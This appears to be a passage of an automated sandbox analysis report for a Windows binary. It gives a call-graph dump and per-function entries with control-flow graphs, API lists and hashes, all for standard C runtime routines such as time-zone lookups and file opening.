100178->100180 100179->100164 100193 7ff7ace82d1e 100179->100193 100181 7ff7ace82c67 100180->100181 100182 7ff7ace82da2 100181->100182 100183 7ff7ace81b30 49 API calls 100181->100183 100223 7ff7ace82770 59 API calls 2 library calls 100182->100223 100185 7ff7ace82c94 100183->100185 100185->100182 100188 7ff7ace81b30 49 API calls 100185->100188 100186 7ff7ace82d01 100224 7ff7ace81ab0 74 API calls __std_exception_copy 100186->100224 100191 7ff7ace82cc1 100188->100191 100191->100182 100192 7ff7ace82ccc 100191->100192 100194 7ff7ace817b0 121 API calls 100192->100194 100195 7ff7ace82d84 100193->100195 100193->100202 100219 7ff7ace81440 161 API calls 2 library calls 100193->100219 100220 7ff7ace81780 59 API calls 100193->100220 100196 7ff7ace82ce3 100194->100196 100221 7ff7ace82770 59 API calls 2 library calls 100195->100221 100196->100193 100198 7ff7ace82ce7 100196->100198 100218 7ff7ace824d0 59 API calls 3 library calls 100198->100218 100199 7ff7ace82d95 100222 7ff7ace81ab0 74 API calls __std_exception_copy 100199->100222 100202->100173 100203->99784 100204->99779 100205->99784 100207 7ff7ace83024 100206->100207 100225 7ff7ace93b14 100207->100225 100210 7ff7ace8305b 100212 7ff7ace8acd0 _wfindfirst32i64 8 API calls 100210->100212 100213 7ff7ace82a96 100212->100213 100213->100158 100213->100159 100214->100162 100215->100164 100216->100202 100217->100177 100218->100186 100219->100193 100220->100193 100221->100199 100222->100202 100223->100186 100224->100164 100229 7ff7ace93b6e 100225->100229 100226 7ff7ace93b93 100260 7ff7ace99c14 37 API calls 2 library calls 100226->100260 100228 7ff7ace93bcf 100261 7ff7ace91da0 49 API calls _invalid_parameter_noinfo 100228->100261 100229->100226 100229->100228 100231 7ff7ace93bbd 100233 7ff7ace8acd0 _wfindfirst32i64 8 API calls 100231->100233 100232 7ff7ace99d48 __free_lconv_num 11 API calls 100232->100231 100234 7ff7ace8304a 100233->100234 100234->100210 100243 7ff7ace94d38 100234->100243 100235 7ff7ace93c66 100236 7ff7ace93c78 100235->100236 100237 7ff7ace93cac 100235->100237 100238 7ff7ace93cd0 100235->100238 100239 7ff7ace93c81 100235->100239 100236->100237 100236->100239 100237->100232 100238->100237 100241 7ff7ace93cda 100238->100241 100262 7ff7ace99d48 100239->100262 100242 7ff7ace99d48 __free_lconv_num 11 API calls 100241->100242 100242->100231 100244 7ff7ace94d61 100243->100244 100245 7ff7ace94d55 100243->100245 100294 7ff7ace9494c 45 API calls __GetCurrentState 100244->100294 100269 7ff7ace945b0 100245->100269 100248 7ff7ace94d5a 100248->100210 100249 7ff7ace94d89 100252 7ff7ace94d99 100249->100252 100295 7ff7ace9defc 5 API calls __crtLCMapStringW 100249->100295 100296 7ff7ace94434 14 API calls 3 library calls 100252->100296 100253 7ff7ace94df1 100254 7ff7ace94e09 100253->100254 100255 7ff7ace94df5 100253->100255 100256 7ff7ace945b0 69 API calls 100254->100256 100255->100248 100257 7ff7ace99d48 __free_lconv_num 11 API calls 100255->100257 100258 7ff7ace94e15 100256->100258 100257->100248 100258->100248 100259 7ff7ace99d48 __free_lconv_num 11 API calls 100258->100259 100259->100248 100260->100231 100261->100235 100263 7ff7ace99d4d HeapFree 100262->100263 100267 7ff7ace99d7c 100262->100267 100264 7ff7ace99d68 GetLastError 100263->100264 100263->100267 100265 7ff7ace99d75 __free_lconv_num 100264->100265 100268 7ff7ace94374 11 API calls _get_daylight 100265->100268 100267->100231 100268->100267 100270 7ff7ace945e7 100269->100270 100271 7ff7ace945ca 100269->100271 100270->100271 100273 7ff7ace945fa CreateFileW 100270->100273 100323 7ff7ace94354 11 API calls _get_daylight 100271->100323 100275 7ff7ace94664 100273->100275 100276 7ff7ace9462e 100273->100276 100274 7ff7ace945cf 100324 7ff7ace94374 11 API calls _get_daylight 100274->100324 100326 7ff7ace94c28 46 API calls 3 library calls 100275->100326 100297 7ff7ace94704 GetFileType 100276->100297 100280 7ff7ace94669 100283 7ff7ace94698 100280->100283 100284 7ff7ace9466d 100280->100284 100281 7ff7ace945d7 100325 7ff7ace99ce0 37 API calls _invalid_parameter_noinfo 100281->100325 100328 7ff7ace949e8 100283->100328 100327 7ff7ace942e8 11 API calls 2 library calls 100284->100327 100286 7ff7ace94643 CloseHandle 100290 7ff7ace945e2 100286->100290 100287 7ff7ace94659 CloseHandle 100287->100290 100290->100248 100293 7ff7ace94677 100293->100290 100294->100249 100295->100252 100296->100253 100298 7ff7ace9480f 100297->100298 100299 7ff7ace94752 100297->100299 100301 7ff7ace94817 100298->100301 100302 7ff7ace94839 100298->100302 100300 7ff7ace9477e GetFileInformationByHandle 100299->100300 100346 7ff7ace94b24 21 API calls _fread_nolock 100299->100346 100305 7ff7ace947a7 100300->100305 100306 7ff7ace9482a GetLastError 100300->100306 100301->100306 100307 7ff7ace9481b 100301->100307 100303 7ff7ace9485c PeekNamedPipe 100302->100303 100321 7ff7ace947fa 100302->100321 100303->100321 100308 7ff7ace949e8 51 API calls 100305->100308 100349 7ff7ace942e8 11 API calls 2 library calls 100306->100349 100348 7ff7ace94374 11 API calls _get_daylight 100307->100348 100313 7ff7ace947b2 100308->100313 100311 7ff7ace8acd0 _wfindfirst32i64 8 API calls 100314 7ff7ace9463c 100311->100314 100312 7ff7ace9476c 100312->100300 100312->100321 100339 7ff7ace948ac 100313->100339 100314->100286 100314->100287 100317 7ff7ace948ac 10 API calls 100318 7ff7ace947d1 100317->100318 100319 7ff7ace948ac 10 API calls 100318->100319 100320 7ff7ace947e2 100319->100320 100320->100321 100347 7ff7ace94374 11 API calls _get_daylight 100320->100347 100321->100311 100323->100274 100324->100281 100326->100280 100327->100293 100330 7ff7ace94a10 100328->100330 100329 7ff7ace946a5 100338 7ff7ace94b24 21 API calls _fread_nolock 100329->100338 100330->100329 100350 7ff7ace9e5a4 51 API calls 2 library calls 100330->100350 100332 7ff7ace94aa4 100332->100329 100351 7ff7ace9e5a4 51 API calls 2 library calls 100332->100351 100334 7ff7ace94ab7 100334->100329 100352 7ff7ace9e5a4 51 API calls 2 library calls 100334->100352 100336 7ff7ace94aca 100336->100329 100353 7ff7ace9e5a4 51 API calls 2 library calls 100336->100353 100338->100293 100340 7ff7ace948d5 FileTimeToSystemTime 100339->100340 100341 7ff7ace948c8 100339->100341 100342 7ff7ace948e9 SystemTimeToTzSpecificLocalTime 100340->100342 100344 7ff7ace948d0 100340->100344 100341->100340 100341->100344 100342->100344 100343 7ff7ace8acd0 _wfindfirst32i64 8 API calls 100345 7ff7ace947c1 100343->100345 100344->100343 100345->100317 100346->100312 100347->100321 100348->100321 100349->100321 100350->100332 100351->100334 100352->100336 100353->100329 100355 7ff7ace9532c 100354->100355 100356 7ff7ace95352 100355->100356 100359 7ff7ace95385 100355->100359 100385 7ff7ace94374 11 API calls _get_daylight 100356->100385 100358 7ff7ace95357 100386 7ff7ace99ce0 37 API calls _invalid_parameter_noinfo 100358->100386 100361 7ff7ace95398 100359->100361 100362 7ff7ace9538b 100359->100362 100373 7ff7ace9a028 100361->100373 100387 7ff7ace94374 11 API calls _get_daylight 100362->100387 100364 7ff7ace83ce9 100364->99796 100367 7ff7ace953b9 100380 7ff7ace9f3cc 100367->100380 100368 7ff7ace953ac 100388 7ff7ace94374 11 API calls _get_daylight 100368->100388 100371 7ff7ace953cc 100389 7ff7ace94228 LeaveCriticalSection 100371->100389 100390 7ff7ace9f6b8 EnterCriticalSection 100373->100390 100375 7ff7ace9a03f 100376 7ff7ace9a09c 19 API calls 100375->100376 100377 7ff7ace9a04a 100376->100377 100378 7ff7ace9f718 _isindst LeaveCriticalSection 100377->100378 100379 7ff7ace953a2 100378->100379 100379->100367 100379->100368 100391 7ff7ace9f0c8 100380->100391 100383 7ff7ace9f426 100383->100371 100385->100358 100387->100364 100388->100364 100392 7ff7ace9f103 __vcrt_InitializeCriticalSectionEx 100391->100392 100401 7ff7ace9f2ca 100392->100401 100406 7ff7acea53a4 51 API calls 3 library calls 100392->100406 100394 7ff7ace9f3a1 100410 7ff7ace99ce0 37 API calls _invalid_parameter_noinfo 100394->100410 100396 7ff7ace9f2d3 100396->100383 100403 7ff7acea608c 100396->100403 100398 7ff7ace9f335 100398->100401 100407 7ff7acea53a4 51 API calls 3 library calls 100398->100407 100400 7ff7ace9f354 100400->100401 100408 7ff7acea53a4 51 API calls 3 library calls 100400->100408 100401->100396 100409 7ff7ace94374 11 API calls _get_daylight 100401->100409 100411 7ff7acea568c 100403->100411 100406->100398 100407->100400 100408->100401 100409->100394 100412 7ff7acea56c1 100411->100412 100413 7ff7acea56a3 100411->100413 100412->100413 100416 7ff7acea56dd 100412->100416 100465 7ff7ace94374 11 API calls _get_daylight 100413->100465 100415 7ff7acea56a8 100466 7ff7ace99ce0 37 API calls _invalid_parameter_noinfo 100415->100466 100422 7ff7acea5c9c 100416->100422 100419 7ff7acea56b4 100419->100383 100468 7ff7acea59d0 100422->100468 100425 7ff7acea5d11 100499 7ff7ace94354 11 API calls _get_daylight 100425->100499 100426 7ff7acea5d29 100487 7ff7ace96c2c 100426->100487 100430 7ff7acea5d16 100500 7ff7ace94374 11 API calls _get_daylight 100430->100500 100437 7ff7acea5708 100437->100419 100467 7ff7ace96c04 LeaveCriticalSection 100437->100467 100465->100415 100469 7ff7acea5a16 100468->100469 100470 7ff7acea59fc 100468->100470 100473 7ff7acea5a94 100469->100473 100514 7ff7ace94374 11 API calls _get_daylight 100469->100514 100470->100469 100512 7ff7ace94374 11 API calls _get_daylight 100470->100512 100472 7ff7acea5a0b 100513 7ff7ace99ce0 37 API calls _invalid_parameter_noinfo 100472->100513 100475 7ff7acea5ae5 100473->100475 100516 7ff7ace94374 11 API calls _get_daylight 100473->100516 100483 7ff7acea5b42 100475->100483 100518 7ff7ace9569c 37 API calls 2 library calls 100475->100518 100478 7ff7acea5b3e 100478->100483 100484 7ff7ace99d00 _wfindfirst32i64 17 API calls 100478->100484 100479 7ff7acea5ada 100517 7ff7ace99ce0 37 API calls _invalid_parameter_noinfo 100479->100517 100482 7ff7acea5a89 100515 7ff7ace99ce0 37 API calls _invalid_parameter_noinfo 100482->100515 100483->100425 100483->100426 100486 7ff7acea5bd5 100484->100486 100519 7ff7ace9f6b8 EnterCriticalSection 100487->100519 100499->100430 100500->100437 100512->100472 100514->100482 100516->100479 100518->100478 100521 7ff7ace97898 100520->100521 100524 7ff7ace97374 100521->100524 100523 7ff7ace978b1 100523->99806 100525 7ff7ace9738f 100524->100525 100526 7ff7ace973be 100524->100526 100535 7ff7ace99c14 37 API calls 2 library calls 100525->100535 100534 7ff7ace9421c EnterCriticalSection 100526->100534 100529 7ff7ace973c3 100530 7ff7ace973e0 38 API calls 100529->100530 100531 7ff7ace973cf 100530->100531 100532 7ff7ace94228 _fread_nolock LeaveCriticalSection 100531->100532 100533 7ff7ace973af 100532->100533 100533->100523 100535->100533 100537 7ff7ace8f001 100536->100537 100538 7ff7ace8efd3 100536->100538 100542 7ff7ace8eff3 100537->100542 100546 7ff7ace9421c EnterCriticalSection 100537->100546 100547 7ff7ace99c14 37 API calls 2 library calls 100538->100547 100541 7ff7ace8f018 100543 7ff7ace8f034 72 API calls 100541->100543 100542->99810 100544 7ff7ace8f024 100543->100544 100545 7ff7ace94228 _fread_nolock LeaveCriticalSection 100544->100545 100545->100542 100547->100542

                                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                                            Function 00007FF7ACEA4D50 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 334timeCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 149 7ff7acea4d50-7ff7acea4d8b call 7ff7acea46d8 call 7ff7acea46e0 call 7ff7acea4748 156 7ff7acea4d91-7ff7acea4d9c call 7ff7acea46e8 149->156 157 7ff7acea4fb5-7ff7acea5001 call 7ff7ace99d00 call 7ff7acea46d8 call 7ff7acea46e0 call 7ff7acea4748 149->157 156->157 162 7ff7acea4da2-7ff7acea4dac 156->162 183 7ff7acea513f-7ff7acea51ad call 7ff7ace99d00 call 7ff7acea05e8 157->183 184 7ff7acea5007-7ff7acea5012 call 7ff7acea46e8 157->184 164 7ff7acea4dce-7ff7acea4dd2 162->164 165 7ff7acea4dae-7ff7acea4db1 162->165 168 7ff7acea4dd5-7ff7acea4ddd 164->168 167 7ff7acea4db4-7ff7acea4dbf 165->167 170 7ff7acea4dc1-7ff7acea4dc8 167->170 171 7ff7acea4dca-7ff7acea4dcc 167->171 168->168 172 7ff7acea4ddf-7ff7acea4df2 call 7ff7ace9c9fc 168->172 170->167 170->171 171->164 175 7ff7acea4dfb-7ff7acea4e09 171->175 179 7ff7acea4df4-7ff7acea4df6 call 7ff7ace99d48 172->179 180 7ff7acea4e0a-7ff7acea4e16 call 7ff7ace99d48 172->180 179->175 190 7ff7acea4e1d-7ff7acea4e25 180->190 203 7ff7acea51af-7ff7acea51b6 183->203 204 7ff7acea51bb-7ff7acea51be 183->204 184->183 192 7ff7acea5018-7ff7acea5023 call 7ff7acea4718 184->192 190->190 193 7ff7acea4e27-7ff7acea4e38 call 7ff7ace9f854 190->193 192->183 201 7ff7acea5029-7ff7acea504c call 7ff7ace99d48 GetTimeZoneInformation 192->201 193->157 202 7ff7acea4e3e-7ff7acea4e94 call 7ff7ace8c150 * 4 call 7ff7acea4c6c 193->202 218 7ff7acea5052-7ff7acea5073 201->218 219 7ff7acea5114-7ff7acea513e call 7ff7acea46d0 call 7ff7acea46c0 call 7ff7acea46c8 201->219 261 7ff7acea4e96-7ff7acea4e9a 202->261 209 7ff7acea524b-7ff7acea524e 203->209 205 7ff7acea51c0 204->205 206 7ff7acea51f5-7ff7acea5208 call 7ff7ace9c9fc 204->206 211 7ff7acea51c3 205->211 224 7ff7acea5213-7ff7acea522e call 7ff7acea05e8 206->224 225 7ff7acea520a 206->225 210 7ff7acea5254-7ff7acea525c call 7ff7acea4d50 209->210 209->211 216 7ff7acea51c8-7ff7acea51f4 call 7ff7ace99d48 call 7ff7ace8acd0 210->216 211->216 217 7ff7acea51c3 call 7ff7acea4fcc 211->217 217->216 226 7ff7acea5075-7ff7acea507b 218->226 227 7ff7acea507e-7ff7acea5085 218->227 249 7ff7acea5230-7ff7acea5233 224->249 250 7ff7acea5235-7ff7acea5247 call 7ff7ace99d48 224->250 234 7ff7acea520c-7ff7acea5211 call 7ff7ace99d48 225->234 226->227 235 7ff7acea5087-7ff7acea508f 227->235 236 7ff7acea5099 227->236 234->205 235->236 237 7ff7acea5091-7ff7acea5097 235->237 241 7ff7acea509b-7ff7acea510f call 7ff7ace8c150 * 4 call 7ff7acea1bac call 7ff7acea5264 * 2 236->241 237->241 241->219 249->234 250->209 263 7ff7acea4ea0-7ff7acea4ea4 261->263 264 7ff7acea4e9c 261->264 263->261 266 7ff7acea4ea6-7ff7acea4ecb call 7ff7acea7b94 263->266 264->263 272 7ff7acea4ece-7ff7acea4ed2 266->272 274 7ff7acea4ee1-7ff7acea4ee5 272->274 275 7ff7acea4ed4-7ff7acea4edf 272->275 274->272 275->274 277 7ff7acea4ee7-7ff7acea4eeb 275->277 279 7ff7acea4f6c-7ff7acea4f70 277->279 280 7ff7acea4eed-7ff7acea4f15 call 7ff7acea7b94 277->280 283 7ff7acea4f72-7ff7acea4f74 279->283 284 7ff7acea4f77-7ff7acea4f84 279->284 289 7ff7acea4f33-7ff7acea4f37 280->289 290 7ff7acea4f17 280->290 283->284 285 7ff7acea4f9f-7ff7acea4fae call 7ff7acea46d0 call 7ff7acea46c0 284->285 286 7ff7acea4f86-7ff7acea4f9c call 7ff7acea4c6c 284->286 285->157 286->285 289->279 295 7ff7acea4f39-7ff7acea4f57 call 7ff7acea7b94 289->295 293 7ff7acea4f1a-7ff7acea4f21 290->293 293->289 296 7ff7acea4f23-7ff7acea4f31 293->296 301 7ff7acea4f63-7ff7acea4f6a 295->301 296->289 296->293 301->279 302 7ff7acea4f59-7ff7acea4f5d 301->302 302->279 303 7ff7acea4f5f 302->303 303->301
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF7ACEA4D95
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACEA46E8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7ACEA46FC
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACE99D48: HeapFree.KERNEL32(?,?,?,00007FF7ACEA1D72,?,?,?,00007FF7ACEA1DAF,?,?,00000000,00007FF7ACEA2275,?,?,?,00007FF7ACEA21A7), ref: 00007FF7ACE99D5E
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACE99D48: GetLastError.KERNEL32(?,?,?,00007FF7ACEA1D72,?,?,?,00007FF7ACEA1DAF,?,?,00000000,00007FF7ACEA2275,?,?,?,00007FF7ACEA21A7), ref: 00007FF7ACE99D68
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACE99D00: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF7ACE99CDF,?,?,?,?,?,00007FF7ACE9211C), ref: 00007FF7ACE99D09
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACE99D00: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF7ACE99CDF,?,?,?,?,?,00007FF7ACE9211C), ref: 00007FF7ACE99D2E
                                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF7ACEA4D84
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACEA4748: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7ACEA475C
                                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF7ACEA4FFA
                                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF7ACEA500B
                                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF7ACEA501C
                                                                                                                                                                                                            • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7ACEA525C), ref: 00007FF7ACEA5043
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285072056.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285112439.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285184571.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                                                                                                                            • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                                                                                                                            • API String ID: 4070488512-239921721
                                                                                                                                                                                                            • Opcode ID: 9604240e68820e5562e5c5bdf89ef322da5820e448d3a90649f181d06af63343
                                                                                                                                                                                                            • Instruction ID: cc3d5d07ba566296964640fa477d9531a66c568089070c5d1f02e8e399f8538d
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9604240e68820e5562e5c5bdf89ef322da5820e448d3a90649f181d06af63343
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0BD1F576A0E642AAEB20FF21D4811B9E791FF84785FCA9035EA0D576A5DF3CE441C360
                                                                                                                                                                                                            Function 00007FF7ACEA5C9C Relevance: 13.8, APIs: 9, Instructions: 276fileCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 431 7ff7acea5c9c-7ff7acea5d0f call 7ff7acea59d0 434 7ff7acea5d11-7ff7acea5d1a call 7ff7ace94354 431->434 435 7ff7acea5d29-7ff7acea5d33 call 7ff7ace96c2c 431->435 440 7ff7acea5d1d-7ff7acea5d24 call 7ff7ace94374 434->440 441 7ff7acea5d35-7ff7acea5d4c call 7ff7ace94354 call 7ff7ace94374 435->441 442 7ff7acea5d4e-7ff7acea5db7 CreateFileW 435->442 454 7ff7acea606a-7ff7acea608a 440->454 441->440 445 7ff7acea5e34-7ff7acea5e3f GetFileType 442->445 446 7ff7acea5db9-7ff7acea5dbf 442->446 448 7ff7acea5e92-7ff7acea5e99 445->448 449 7ff7acea5e41-7ff7acea5e7c GetLastError call 7ff7ace942e8 CloseHandle 445->449 451 7ff7acea5e01-7ff7acea5e2f GetLastError call 7ff7ace942e8 446->451 452 7ff7acea5dc1-7ff7acea5dc5 446->452 457 7ff7acea5ea1-7ff7acea5ea4 448->457 458 7ff7acea5e9b-7ff7acea5e9f 448->458 449->440 465 7ff7acea5e82-7ff7acea5e8d call 7ff7ace94374 449->465 451->440 452->451 459 7ff7acea5dc7-7ff7acea5dff CreateFileW 452->459 463 7ff7acea5eaa-7ff7acea5eff call 7ff7ace96b44 457->463 464 7ff7acea5ea6 457->464 458->463 459->445 459->451 469 7ff7acea5f01-7ff7acea5f0d call 7ff7acea5bd8 463->469 470 7ff7acea5f1e-7ff7acea5f4f call 7ff7acea5750 463->470 464->463 465->440 469->470 476 7ff7acea5f0f 469->476 477 7ff7acea5f51-7ff7acea5f53 470->477 478 7ff7acea5f55-7ff7acea5f97 470->478 479 7ff7acea5f11-7ff7acea5f19 call 7ff7ace99ec0 476->479 477->479 480 7ff7acea5fb9-7ff7acea5fc4 478->480 481 7ff7acea5f99-7ff7acea5f9d 478->481 479->454 484 7ff7acea6068 480->484 485 7ff7acea5fca-7ff7acea5fce 480->485 481->480 483 7ff7acea5f9f-7ff7acea5fb4 481->483 483->480 484->454 485->484 486 7ff7acea5fd4-7ff7acea6019 CloseHandle CreateFileW 485->486 488 7ff7acea601b-7ff7acea6049 GetLastError call 7ff7ace942e8 call 7ff7ace96d6c 486->488 489 7ff7acea604e-7ff7acea6063 486->489 488->489 489->484
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285072056.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285112439.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285184571.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1617910340-0
                                                                                                                                                                                                            • Opcode ID: 632e748b839932f5b00ec5f176d5a067dee1d4c4f3157cbf34afbb6f699b0397
                                                                                                                                                                                                            • Instruction ID: aa2eed03ff51c4924e06a66f0e0230fac6009a17ca9d9430a36da21129a4c5d1
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 632e748b839932f5b00ec5f176d5a067dee1d4c4f3157cbf34afbb6f699b0397
                                                                                                                                                                                                            • Instruction Fuzzy Hash: D3C1E276B2EA4199EB10EF65C4802BD7761FB49B98B864235DF2E673A4CF38D055C310
                                                                                                                                                                                                            Function 00007FF7ACEA4FCC Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 143timeCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 812 7ff7acea4fcc-7ff7acea5001 call 7ff7acea46d8 call 7ff7acea46e0 call 7ff7acea4748 819 7ff7acea513f-7ff7acea51ad call 7ff7ace99d00 call 7ff7acea05e8 812->819 820 7ff7acea5007-7ff7acea5012 call 7ff7acea46e8 812->820 832 7ff7acea51af-7ff7acea51b6 819->832 833 7ff7acea51bb-7ff7acea51be 819->833 820->819 825 7ff7acea5018-7ff7acea5023 call 7ff7acea4718 820->825 825->819 831 7ff7acea5029-7ff7acea504c call 7ff7ace99d48 GetTimeZoneInformation 825->831 845 7ff7acea5052-7ff7acea5073 831->845 846 7ff7acea5114-7ff7acea513e call 7ff7acea46d0 call 7ff7acea46c0 call 7ff7acea46c8 831->846 837 7ff7acea524b-7ff7acea524e 832->837 834 7ff7acea51c0 833->834 835 7ff7acea51f5-7ff7acea5208 call 7ff7ace9c9fc 833->835 839 7ff7acea51c3 834->839 850 7ff7acea5213-7ff7acea522e call 7ff7acea05e8 835->850 851 7ff7acea520a 835->851 838 7ff7acea5254-7ff7acea525c call 7ff7acea4d50 837->838 837->839 843 7ff7acea51c8-7ff7acea51f4 call 7ff7ace99d48 call 7ff7ace8acd0 838->843 839->843 844 7ff7acea51c3 call 7ff7acea4fcc 839->844 844->843 852 7ff7acea5075-7ff7acea507b 845->852 853 7ff7acea507e-7ff7acea5085 845->853 871 7ff7acea5230-7ff7acea5233 850->871 872 7ff7acea5235-7ff7acea5247 call 7ff7ace99d48 850->872 858 7ff7acea520c-7ff7acea5211 call 7ff7ace99d48 851->858 852->853 859 7ff7acea5087-7ff7acea508f 853->859 860 7ff7acea5099 853->860 858->834 859->860 861 7ff7acea5091-7ff7acea5097 859->861 864 7ff7acea509b-7ff7acea510f call 7ff7ace8c150 * 4 call 7ff7acea1bac call 7ff7acea5264 * 2 860->864 861->864 864->846 871->858 872->837
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF7ACEA4FFA
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACEA4748: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7ACEA475C
                                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF7ACEA500B
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACEA46E8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7ACEA46FC
                                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF7ACEA501C
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACEA4718: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7ACEA472C
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACE99D48: HeapFree.KERNEL32(?,?,?,00007FF7ACEA1D72,?,?,?,00007FF7ACEA1DAF,?,?,00000000,00007FF7ACEA2275,?,?,?,00007FF7ACEA21A7), ref: 00007FF7ACE99D5E
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACE99D48: GetLastError.KERNEL32(?,?,?,00007FF7ACEA1D72,?,?,?,00007FF7ACEA1DAF,?,?,00000000,00007FF7ACEA2275,?,?,?,00007FF7ACEA21A7), ref: 00007FF7ACE99D68
                                                                                                                                                                                                            • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7ACEA525C), ref: 00007FF7ACEA5043
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285072056.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285112439.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285184571.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                                            • String ID: Eastern Standard Time$Eastern Summer Time
